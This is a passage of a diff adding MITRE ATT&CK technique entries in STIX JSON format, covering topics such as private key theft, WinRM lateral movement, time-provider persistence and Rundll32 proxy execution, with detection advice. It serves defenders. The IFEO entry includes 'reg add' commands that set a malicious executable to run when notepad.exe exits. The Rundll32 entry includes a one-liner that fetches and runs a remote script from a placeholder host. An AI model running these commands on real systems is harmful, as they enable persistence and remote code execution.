"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0854", + "external_id": "T0854" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:06.171Z", + "name": "Loss of Safety", + "description": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. \n\nMany unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0880", + "external_id": "T0880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-12T23:52:08.194Z", + "name": "Private Keys", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Itzik Kotler, SafeBreach", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. For network infrastructure devices, collect AAA logging to monitor for private keys being exported.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "created": "2020-02-04T13:06:49.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/004", + "external_id": "T1552.004" + }, + { + "source_name": "Palo Alto Prince of Persia", + "description": "Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/" + }, + { + "source_name": "cisco_deploy_rsa_keys", + "description": "Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436" + }, + { + "source_name": "AADInternals Azure AD Device Identities", + "description": "Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.", + "url": "https://aadinternals.com/post/deviceidentity/" + }, + { + "source_name": "Kaspersky Careto", + "description": "Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.", + "url": "https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf" + }, + { + "source_name": "Microsoft Primary Refresh Token", + "description": "Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.", + "url": "https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token" + }, + { + "source_name": "Wikipedia Public Key Crypto", + "description": "Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.", + "url": "https://en.wikipedia.org/wiki/Public-key_cryptography" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-28T21:22:52.176Z", + "name": "Server", + "description": "Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) \n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Dor Edry, Microsoft" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", + "created": "2020-10-01T00:48:09.578Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/004", + "external_id": "T1583.004" + }, + { + "source_name": "Freejacked", + "description": "Clark, Michael. (2023, August 14). Google’s Vertex AI Platform Gets Freejacked. Retrieved February 28, 2024.", + "url": "https://sysdig.com/blog/googles-vertex-ai-platform-freejacked/" + }, + { + "source_name": "Free Trial PurpleUrchin", + "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", + "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T15:26:41.941Z", + "name": "Windows Remote Management", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "created": "2020-02-11T18:29:47.757Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/006", + "external_id": "T1021.006" + }, + { + "source_name": "Medium Detecting Lateral Movement", + "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc" + }, + { + "source_name": "Jacobsen 2014", + "description": "Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.", + "url": "https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2" + }, + { + "source_name": "MSDN WMI", + "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/aa394582.aspx" + }, + { + "source_name": "Microsoft WinRM", + "description": "Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa384426" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Exfiltration Over Bluetooth", + "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "created": "2020-03-09T17:07:57.392Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1011/001", + "external_id": "T1011.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-07T14:27:04.770Z", + "name": "Default Accounts", + "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "created": "2020-03-13T20:15:31.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078/001", + "external_id": "T1078.001" + }, + { + "source_name": "AWS Root User", + "description": "Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + }, + { + "source_name": "Microsoft Local Accounts Feb 2019", + "description": "Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts" + }, + { + "source_name": "Metasploit SSH Module", + "description": "undefined. (n.d.). Retrieved April 12, 2019.", + "url": "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh" + }, + { + "source_name": "Threat Matrix for Kubernetes", + "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T02:34:58.003Z", + "name": "Time Providers", + "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Scott Lundgren, @5twenty9, Carbon Black", + "Harun Küßner" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "SYSTEM", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "created": "2020-01-24T15:51:52.317Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/003", + "external_id": "T1547.003" + }, + { + "source_name": "Github W32Time Oct 2017", + "description": "Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.", + "url": "https://github.com/scottlundgren/w32time" + }, + { + "source_name": "Microsoft W32Time May 2017", + "description": "Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.", + "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings" + }, + { + "source_name": "Microsoft W32Time Feb 2018", + "description": "Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.", + "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top" + }, + { + "source_name": "Microsoft TimeProvider", + "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Image File Execution Options Injection", + "description": "Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\\dbg\\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nAn example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)\n\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"C:\\temp\\evil.exe\"\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.\n\nMalware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Oddvar Moe, @oddvarmoe" + ], + "x_mitre_detection": "Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Autoruns Analysis" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1183", + "external_id": "T1183" + }, + { + "source_name": "Microsoft Dev Blog IFEO Mar 2010", + "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.", + "url": "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" + }, + { + "source_name": "Microsoft GFlags Mar 2017", + "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.", + "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview" + }, + { + "source_name": "Microsoft Silent Process Exit NOV 2017", + "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.", + "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit" + }, + { + "source_name": "Oddvar Moe IFEO APR 2018", + "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.", + "url": "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "FSecure Hupigon", + "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.", + "url": "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml" + }, + { + "source_name": "Symantec Ushedix June 2008", + "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.", + "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Rundll32", + "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ricardo Dias", + "Casey Smith" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application whitelisting", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", + "created": "2017-05-31T21:31:06.045Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1085", + "external_id": "T1085" + }, + { + "source_name": "Trend Micro 